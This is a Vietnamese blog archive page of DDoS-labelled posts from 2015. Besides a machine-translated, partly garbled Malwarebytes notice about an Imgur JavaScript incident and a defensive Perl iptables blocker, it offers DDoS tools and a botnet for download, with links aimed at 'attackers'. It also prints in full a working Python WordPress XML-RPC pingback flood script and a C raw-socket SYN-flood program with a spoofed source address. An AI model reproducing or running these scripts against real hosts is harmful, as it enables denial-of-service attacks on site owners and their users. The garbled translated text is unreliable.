Hiển thị các bài đăng có nhãn DDos. Hiển thị tất cả bài đăng
Hiển thị các bài đăng có nhãn DDos. Hiển thị tất cả bài đăng

Thứ Ba, 13 tháng 10, 2015

Chống DDoS cho trang web của bạn


Vì vậy, một vài người trong số bạn có thể đã nhận thấy rằng chúng tôi bắt đầu chặn "Imgur.com" đó là một trang web chia sẻ ảnh phổ biến.
Lý do chúng tôi đã làm điều này là vì một lỗ hổng trong mã của họ cho phép tội phạm mạng để tải mã javascript độc vào các trình duyệt của người dùng trang web. Điều này sẽ được sử dụng để biến mỗi hệ thống thành một vũ khí DDoS (Distributed Denial of Service).
Các mục tiêu của các cuộc tấn công DDoS là 4chan & 8chan, đó là các trang web tin hình ảnh phong cách bảng đăng.
Danh tính của những kẻ tấn công hay động lực của họ là không biết tại thời điểm này, tuy nhiên nó có thể là một nhóm cư dân tiểu internet giận sử dụng một lỗ hổng trong mã của imgur hơn là sử dụng việc sử dụng một botnet (đó là cách tiếp cận truyền thống) hoặc một Quân đội của người sử dụng đều tức giận.
Imgur đã từng tung ra một tuyên bố cho phép folks biết rằng lỗi trong mã đã được vá và du khách hiện tại nên được tốt.

Capture
Tuy nhiên, họ cũng khuyên rằng folks xóa bộ nhớ cache của trình duyệt của họ trong trường hợp các javascript độc hại vẫn được nạp và hoạt động ở chế độ nền. Có rất nhiều mối đe dọa tiềm ẩn liên quan cho phép mã này để chạy trên hệ thống của bạn, như được mô tả bởi Lyra883 trong một Reddit viết  mã có thể:
  • Truyền khẩu của bạn để tấn công
  • Trở thành một phần của một công DDoS khổng lồ
  • Thường xuyên tải quảng cáo trả những kẻ tấn công
  • Yêu cầu edgelord-tier khiêu dâm trẻ em từ một honeypot mà bạn không biết
Click vào đây để được hướng dẫn làm thế nào để xóa bộ nhớ cache trình duyệt của bạn và loại bỏ các mối đe dọa.
Click vào đây nếu bạn cảm thấy thoải mái trở lại sử dụng imgur của bạn nhưng không muốn vô hiệu hóa Malwarebytes Bảo vệ Web của bạn.
Dưới đây cũng là một mẹo tốt cho tất cả các danh sách trắng của các tên miền phụ imgur:
danh sách trắng
Hãy nhớ rằng bằng cách chặn một trang web bị chặn, bạn đang làm như vậy nguy cơ của riêng của bạn như Malwarebytes Các nhà nghiên cứu không tin tưởng nó.
Chúng tôi đang làm việc để xác định nếu imgur là một lần nữa an toàn cho tất cả người dùng và ngay khi chúng tôi cảm thấy tự tin vào thực tế rằng chúng ta sẽ bỏ cấm trang web của họ. Hãy tiếp tục theo dõi để cập nhật và lướt web an toàn!

UPDATE: 
Sau khi nói chuyện với các nhân viên của Imgur về những gì họ đã làm để sửa chữa các vấn đề và ngăn chặn chúng từ xảy ra một lần nữa trong tương lai, chúng tôi đã loại bỏ khối của chúng tôi và không nên có vấn đề hơn nữa. Hãy chắc chắn rằng bạn cập nhật lên phiên bản cơ sở dữ liệu mới nhất để loại bỏ các khối.
UPDATE 2:
Từ Imgur:
 Trong ngắn hạn, ai đó quản lý để tải lên một tập tin HTML với JavaScript độc hại bên trong của nó nhắm 8chan. Lỗ hổng này là hoàn toàn vá và nó không còn có thể tải lên tập tin của loại đó. Không chỉ được điều này cụ thể vá, nhưng chúng tôi ngăn chặn các máy chủ của chúng tôi từ i.imgur.com phục vụ bất cứ điều gì khác hơn là tập tin hình ảnh. Điều này có nghĩa rằng chúng tôi đã dừng lại khả năng phục vụ cho bất kỳ tập tin JavaScript khác như thế này. Không có dữ liệu người dùng như mật khẩu và e-mail đã bị rò rỉ.
Nice work để Imgur cho phản ứng nhanh chóng của họ và chuyển động vào việc sửa vấn đề này để đảm bảo rằng người dùng của họ được an toàn và an toàn!
Nhờ mọi người sau cùng và như mọi khi, lướt web an toàn!

Thứ Tư, 7 tháng 10, 2015

DDoS Perl Mạnh nhất bằng KODING

link tải : DDoS Perl Mạnh nhất bằng KODING
Hướng dẫn :https://youtu.be/BoBs55dk3_U
tải : http://www.mediafire.com/view/lgq19fr0r9lh408/ght_v2_.pl

Thứ Bảy, 3 tháng 10, 2015

Tool DDoS dành cho Attacker !

New DDos Tools Perl & Python Script

http://www.mediafire.com/download/76un585r58jbhzj/Infamous.rar




http://www.mediafire.com/download/y599t3sica3ic95/FrezzY-Dos.rar



This DDos Tools Perl Script And Python Script

Bu DDos Programları Perl Script Ve Python Scriptlidir

Thứ Hai, 28 tháng 9, 2015

DDoS Block PERL NEW HOT

CODE:

#!/usr/bin/perl

###############################################################################
## DDOSBlock version 0.1 Author: Jo3-GHT                                      #
##                                                                            #
## Download from https://sourceforge.net/projects/ddosblock                   #
##                                                                            #
## To execute, run:                                                           #
##                                                                            #
## ./ddosblock-0.2.pl                                                         #
###############################################################################

use strict;
use warnings;

use vars qw(%CONFIG %blocked);

$| = 1;

my %CONFIG = (

  ## 0 = No output
  ## 1 = Actions reported
  ## 2 = Actions + unix commands reported
  ## 3 = Verbose in the extreme

  DEBUG => 2,

  ## Do we perform checks only - no IPTABLE changes - Good for debugging

  TESTMODE => 0,

  ## Ban IP addresses above this number of accesses

  THRESHOLD => 150,

  ## How long, in seconds, between checks

  INTERVAL => 30,

  ## If we have APF use that, otherwise fallback on iptables

  USEAPF => 0,

  ## How long (in seconds) do we ban people for
  ## escalating each time they're bad
  ## This resets to the first item, when they have gone
  ## a full interval without being flagged
  ##
  ## 60, 300, 3600 would mean that they are banned for 60 seconds, then 5 minutes, then an hour
  ##
  ## This list can have as many increment levels as you like

  BANINCREMENTS => [60, 120, 240, 800, 1200],

  ## IP ADDRESSES THAT WE WILL NEVER BAN

  EXCLUDEIPS => [ "127.0.0.1", "10.0.0.1" ],

  ## UNIX COMMANDS

  NETSTAT => "/bin/netstat",

  IPT => "/usr/sbin/iptables",

  APF => "/usr/local/sbin/apf",

  SENDMAIL => "/usr/sbin/sendmail",

  ## WHERE TO STORE/SAVE OUTPUT

  LOGDIR => "/var/log/ddosblock",

  MAILTO => "nobody\@example.com", # NOTE: Under Perl you have to escape the @ symbol with a slash

  STDOUT => 1, # In addition to logging, do we want to report it to STDOUT

);

$CONFIG{TOTINCREMENTS} = $#{$CONFIG{BANINCREMENTS}};
$CONFIG{LISTFILE}      = "$CONFIG{LOGDIR}/bannedips.txt";
$CONFIG{LASTDAY}       = 0;

if ( ! -d $CONFIG{LOGDIR})
{
  print "Creating log directory $CONFIG{LOGDIR}\n\n";
  mkdir $CONFIG{LOGDIR},700;
}

my $command = qq($CONFIG{NETSTAT} -ntu | awk '{ sub(/(.*)\:/,"",\$4); sub(/\:(.*)/,"",\$5); print \$5,\$4}' | grep ^[0-9] | sort | uniq -c | sort -nr | head -30 );

&rotatelog();

if ($CONFIG{TESTMODE} == 1)
{
  &debug(qq(** NOTE **\n\nTest mode - No IPTABLE changes will be made\n));
}

&loadbanned();

while (1)
{
  &rotatelog();

  &check();

  &release();

  &debug(qq(- Sleeping for $CONFIG{INTERVAL} seconds\n)) if ($CONFIG{DEBUG} > 1);

  sleep $CONFIG{INTERVAL};
}

sub rotatelog
{
  my @date = localtime();
  my $weekday = $date[6];

  if ($weekday != $CONFIG{LASTDAY})
  {
    if ($CONFIG{LASTDAY})
    {
      close(DEBUG);
    }
    $CONFIG{LASTDAY} = $weekday;

    open(DEBUG, "> $CONFIG{LOGDIR}/doslog.$weekday.txt");
  }
}

sub check
{
  my @input = `$command`;

  my $now = time;

  my $savelist;

  INPUTLOOP:
  foreach my $item (@input)
  {
    chomp($item);

    $item =~ s/^ +//io;
    $item =~ s/ +/ /io;

    &debug("-- $item\n") if ($CONFIG{DEBUG} >= 3);

    my ($hits, $ipaddress, $port) = split(/ /, $item);

    next INPUTLOOP if (grep(/^$ipaddress/, @{$CONFIG{EXCLUDEIPS}}));

    next INPUTLOOP if (defined $blocked{$ipaddress} && $now < $blocked{$ipaddress}{sleepuntil});

    if ($hits > $CONFIG{THRESHOLD})
    {
      $blocked{$ipaddress}{blocklevel} = $blocked{$ipaddress}{lastblock} + 1 || 1;
      $blocked{$ipaddress}{lastblock}  = $blocked{$ipaddress}{blocklevel};

      if ($blocked{$ipaddress}{blocklevel} == 1)
      {
        my $iptcmd     = ($CONFIG{USEAPF}) ?
          "$CONFIG{APF} -d $ipaddress"
        :
          "$CONFIG{IPT} -I INPUT -s $ipaddress -j DROP";

        my $ok = `$iptcmd` unless ($CONFIG{TESTMODE});

        &debug("Adding block for $ipaddress ($hits hits/minute, port $port)") if ($CONFIG{DEBUG} > 0);
        &debug("- Command $iptcmd") if ($CONFIG{DEBUG} > 1);

        if ($CONFIG{MAILTO})
        {
          my $localtime = localtime();

          open (MAIL, "| $CONFIG{SENDMAIL} -t");
          print MAIL qq(To: $CONFIG{MAILTO}\nSubject: IP address $ipaddress banned\n\nBanned ip addresses $ipaddress on $localtime with $hits hits\n);
          close (MAIL);
        }
      }
      else
      {
        &debug("Setting $ipaddress to block level $blocked{$ipaddress}{blocklevel} ($hits hits/minute)") if ($CONFIG{DEBUG} > 0);
      }

      &updatesleep($ipaddress);

      $savelist = 1;
    }
  }

  # Save a list of banned IPs to a file incase this process dies
  if ($savelist)
  {
    &savebanned();
  }
}

sub release
{
  my $now = time;
  my $savelist;

  # Loop through all the IP addresses flagged

  foreach my $ipaddress (keys %blocked)
  {
    # No point looking at it until we've gone past the sleep date

    if ($now > $blocked{$ipaddress}{sleepuntil})
    {
      $blocked{$ipaddress}{passcount}++;

      # Remove the block on the first pass
      # then remove the

      if ($blocked{$ipaddress}{passcount} == 1)
      {
        # Release the block

        my $iptcmd = ($CONFIG{USEAPF}) ?
          "$CONFIG{IPT} -u "
          :
          "$CONFIG{IPT} -D INPUT -s $ipaddress -j DROP";

        &debug("Removing block from $ipaddress") if ($CONFIG{DEBUG}> 0);
        &debug("- Command $iptcmd") if ($CONFIG{DEBUG} > 1);

        my $ok = `$iptcmd` unless ($CONFIG{TESTMODE});

        $blocked{$ipaddress}{blocklevel} = 0;
      }
      else
      {
        &debug("- Two passes without issue $ipaddress, forgetting block level") if ($CONFIG{DEBUG} > 1);
        delete $blocked{$ipaddress};
      }

      $savelist = 1;
    }
  }

  # Save a list of banned IPs to a file incase this process dies
  if ($savelist)
  {
    &savebanned(\%blocked);
  }
}

sub updatesleep
{
  my ($ipaddress) = @_;

  my $blocklevel = $blocked{$ipaddress}{blocklevel};

  $blocklevel = ($blocklevel >= $CONFIG{TOTINCREMENTS}) ? $#{$CONFIG{BANINCREMENTS}} : $blocklevel;

  my $increment = $CONFIG{BANINCREMENTS}[$blocklevel - 1];

  $blocked{$ipaddress}{sleepuntil} = time + $increment;

  my $stamp = localtime(time + $increment);

  &debug("- Will check $ipaddress after $increment seconds ($stamp) - Block level $blocklevel") if ($CONFIG{DEBUG} > 1);
}

sub loadbanned
{
  undef %blocked;

  if (-f $CONFIG{LISTFILE})
  {
    open(LIST, "< $CONFIG{LISTFILE}");
    my @list = <LIST>;
    close (LIST);

    # Rebuild a list of those things we've blocked
    foreach my $ipaddress (@list)
    {
      chomp($ipaddress);

      # Let them be released and evaluated again
      $blocked{$ipaddress}{sleepuntil} = 1;
      $blocked{$ipaddress}{blocklevel} = 1;
      $blocked{$ipaddress}{lastblock}  = 1;
      $blocked{$ipaddress}{passcount}  = 0;

      &debug("- Loading blocked IP $ipaddress") if ($CONFIG{DEBUG} > 0);

    }
  }
}

sub savebanned
{
  my ($list) = @_;

  open(LIST, "> $CONFIG{LISTFILE}");
  print LIST join("\n", keys %blocked);
  close (LIST);
}

sub debug
{
  my ($line) = @_;

  print DEBUG localtime() . " $line \n";

  if ($CONFIG{STDOUT})
  {
    print localtime() . " $line \n";
  }
}

Thứ Hai, 21 tháng 9, 2015

[Hacking] Đồ án tấn công DdOS (rất nhiều tài liệu hay)


Distributed Denial Of Service (DDoS) là kỹ thuật tấn công làm các ISP lo âu, giới hacker chính thống thì
không công nhận DdoS là kỹ thuật tấn công chính thống. Thế nhưng Black hat đang có rất nhiều ưu thế khi triển khai tấn công bằng kỹ thuật DdoS.

Việc phòng ngừa và ngăn chặn DdoS vẫn còn đang thực hiện ở mức độ khắc phục hậu quả và truy tìm thủ phạm. Vậy DdoS là gì mà có nhiều yếu tố đặc biệt như vậy? Bài viết này cố gắng trả lời câu hỏi này dưới lăng kính security. Bố cục bài viết gồm:

Highslide JS


- Giới thiệu về DDoS
- Phân tích các loại tấn công kiểu DDoS
- Phân tích các kỹ thuật Anti-DDoS
- Nhân tố con người trong Anti- DDoS
- Một số trường hợp tấn công DDoS


Các file trong Đồ án tấn công DDOS:
Trích dẫn
DDOS21.doc
DDOS.DOC
Đề Cương Chi Tiết.doc
Denial of Service DOS.rtf
Dos11.rtf
DoS- Denial of Service.rtf
phan biet DOS VA DDOS.rtf
Tìm hiểu về tấn công từ chối dịch vụ DoS.doc
Download link mediafire.com
Tệp tin tải về

Chủ Nhật, 20 tháng 9, 2015

DDOS PERL AND PYTHON 2015

Download: https://www.sendspace.com/file/8drocg

tut hướng dẫn
https://youtu.be/1JwaGTXx9i4
    

Thứ Hai, 14 tháng 9, 2015

Dequiem v-1.8 - Python DDoS Tool

Dequiem v-1.8 - Python DDoS Tool

Dequiem v-1.8 
Dequiem is a DDoS tool written in python 2.7

Features 
  • DDoS
  • Find a website's IP
  • Port Scanning
Requirement :
Python v2.7 or higher

Download 
Dequiem1.8.py (8.6 kB) from Here 

For More Information  
http://sourceforge.net/projects/dequiem/ 
http://sourceforge.net/p/dequiem/blog/ 

Release Changes in Ver 1.8

Patch notes :
-portscan mode added
-help mode changed
-interface is better now 

Warning -
Never Use it for attack on the servers that is not your own server or don't use it without permission from Owner.
This Information is shared from Education Purpose Only.

Thứ Năm, 10 tháng 9, 2015

Share XMLRPC DDoS WORDPRESS

#!/usr/bin/python
import sys
import socket
import threading
import time
import os
Lock = threading.Lock()
def main():
  try:
   in_file = open("list.txt","r")
  except:
   raw_input('You need a list.txt file to work')
   sys.exit(0)
  os.system("title ...:: XMLRPC PingBack DDoS ::... ")
  print '-------------------------------------------------------------------------\n'
  print '\tXML-RPC PingBack API Remote DDoS'
  print '\tDate : 20/04/2014'
  print '\tTested on Windows 7 / Windows Server 2012 / FreeBSD 9.2'
  print '\tPython version coded by : Sikh887 \n'
  print '--------------------------------------------------------------------------\n\n '
  num_thread = input("Number of thread: ")
  url = raw_input("Target: ")
  for i in range(num_thread):
   try:
    in_line = in_file.readline()
    Thread1(url, i+1, in_line).start()
    in_line = in_line[:-1]
   except:
    pass
  time.sleep(3)


class Thread1(threading.Thread):
 def __init__(self, url, number, blog):
  self.url = url
  self.number = number
  self.blog = blog
  threading.Thread.__init__(self)
 
 def run(self):
  Lock.acquire()
  print 'Starting thread #%s'%self.number
  Lock.release()
  function_pingback = "<?xml version='1.0' encoding='iso-8859-1'?><methodcall><methodname>pingback.ping</methodName><params><param><value><string>%s</string></value></param>
<param><value><string>%s</string></value></param>
</params></methodCall>"%(self.url, self.blog)
  request_lenght = len(function_pingback)
  try:
   self.blog_cleaned = self.blog.split("?p=")[0]
   self.blog_cleaned1 = self.blog_cleaned.split("http://")[1].split("/")[0]
  except:
   sys.exit(0)
  request = "POST %s/xmlrpc.php HTTP/1.0\r\nHost: %s\r\nUser-Agent: Internal Wordpress RPC connection\r\nContent-Type: text/xml\r\nContent-Length: %s\r\n\n<?xml version=\"1.0\" encoding=\"iso-8859-1\"?><methodcall><methodname>pingback.ping</methodName><params><param><value><string>%s</string></value></param>
<param><value><string>%s</string></value></param>
</params></methodCall>\r\n\r\n"%(self.blog_cleaned, self.blog_cleaned1, request_lenght, self.url, self.blog)
  while True:
    time.sleep(3)
    try:
     s = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.SOL_TCP)
     s.connect((self.blog_cleaned1, 80))
     s.send(request)
     print"Thread %s | Blog %s"%(self.number, self.blog_cleaned1)
    except:
     ok = 0
main()

Chủ Nhật, 30 tháng 8, 2015

Solar BotNet (Pro BotNet) 2015

Solar BotNet (Pro BotNet) 2015
►| Download ►| 

Link ; ► http://linkshrink.net/7XgHcp

https://youtu.be/8nXccbuNzmA

Thứ Bảy, 29 tháng 8, 2015

Syn-flood-Dos-Attack

/*
    Syn Flood DOS with LINUX sockets
*/
#include<stdio.h>
#include<string.h> //memset
#include<sys/socket.h>
#include<stdlib.h> //for exit(0);
#include<errno.h> //For errno - the error number
#include<netinet/tcp.h>   //Provides declarations for tcp header
#include<netinet/ip.h>    //Provides declarations for ip header
 
struct pseudo_header    //needed for checksum calculation
{
    unsigned int source_address;
    unsigned int dest_address;
    unsigned char placeholder;
    unsigned char protocol;
    unsigned short tcp_length;
     
    struct tcphdr tcp;
};
 
unsigned short csum(unsigned short *ptr,int nbytes) {
    register long sum;
    unsigned short oddbyte;
    register short answer;
 
    sum=0;
    while(nbytes>1) {
        sum+=*ptr++;
        nbytes-=2;
    }
    if(nbytes==1) {
        oddbyte=0;
        *((u_char*)&oddbyte)=*(u_char*)ptr;
        sum+=oddbyte;
    }
 
    sum = (sum>>16)+(sum & 0xffff);
    sum = sum + (sum>>16);
    answer=(short)~sum;
     
    return(answer);
}
 
int main (void)
{
    //Create a raw socket
    int s = socket (PF_INET, SOCK_RAW, IPPROTO_TCP);
    //Datagram to represent the packet
    char datagram[4096] , source_ip[32];
    //IP header
    struct iphdr *iph = (struct iphdr *) datagram;
    //TCP header
    struct tcphdr *tcph = (struct tcphdr *) (datagram + sizeof (struct ip));
    struct sockaddr_in sin;
    struct pseudo_header psh;
     
    strcpy(source_ip , "192.168.1.2");
   
    sin.sin_family = AF_INET;
    sin.sin_port = htons(80);
    sin.sin_addr.s_addr = inet_addr ("1.2.3.4");
     
    memset (datagram, 0, 4096); /* zero out the buffer */
     
    //Fill in the IP Header
    iph->ihl = 5;
    iph->version = 4;
    iph->tos = 0;
    iph->tot_len = sizeof (struct ip) + sizeof (struct tcphdr);
    iph->id = htons(54321);  //Id of this packet
    iph->frag_off = 0;
    iph->ttl = 255;
    iph->protocol = IPPROTO_TCP;
    iph->check = 0;      //Set to 0 before calculating checksum
    iph->saddr = inet_addr ( source_ip );    //Spoof the source ip address
    iph->daddr = sin.sin_addr.s_addr;
     
    iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
     
    //TCP Header
    tcph->source = htons (1234);
    tcph->dest = htons (80);
    tcph->seq = 0;
    tcph->ack_seq = 0;
    tcph->doff = 5;      /* first and only tcp segment */
    tcph->fin=0;
    tcph->syn=1;
    tcph->rst=0;
    tcph->psh=0;
    tcph->ack=0;
    tcph->urg=0;
    tcph->window = htons (5840); /* maximum allowed window size */
    tcph->check = 0;/* if you set a checksum to zero, your kernel's IP stack
                should fill in the correct checksum during transmission */
    tcph->urg_ptr = 0;
    //Now the IP checksum
     
    psh.source_address = inet_addr( source_ip );
    psh.dest_address = sin.sin_addr.s_addr;
    psh.placeholder = 0;
    psh.protocol = IPPROTO_TCP;
    psh.tcp_length = htons(20);
     
    memcpy(&psh.tcp , tcph , sizeof (struct tcphdr));
     
    tcph->check = csum( (unsigned short*) &psh , sizeof (struct pseudo_header));
     
    //IP_HDRINCL to tell the kernel that headers are included in the packet
    int one = 1;
    const int *val = &one;
    if (setsockopt (s, IPPROTO_IP, IP_HDRINCL, val, sizeof (one)) < 0)
    {
        printf ("Error setting IP_HDRINCL. Error number : %d . Error message : %s \n" , errno , strerror(errno));
        exit(0);
    }
     
    //Uncommend the loop if you want to flood :)
    //while (1)
    //{
        //Send the packet
        if (sendto (s,      /* our socket */
                    datagram,   /* the buffer containing headers and data */
                    iph->tot_len,    /* total length of our datagram */
                    0,      /* routing flags, normally always 0 */
                    (struct sockaddr *) &sin,   /* socket addr, just like in */
                    sizeof (sin)) < 0)       /* a normal send() */
        {
            printf ("error\n");
        }
        //Data send successfully
        else
        {
            printf ("Packet Send \n");
        }
    //}
     
    return 0;
}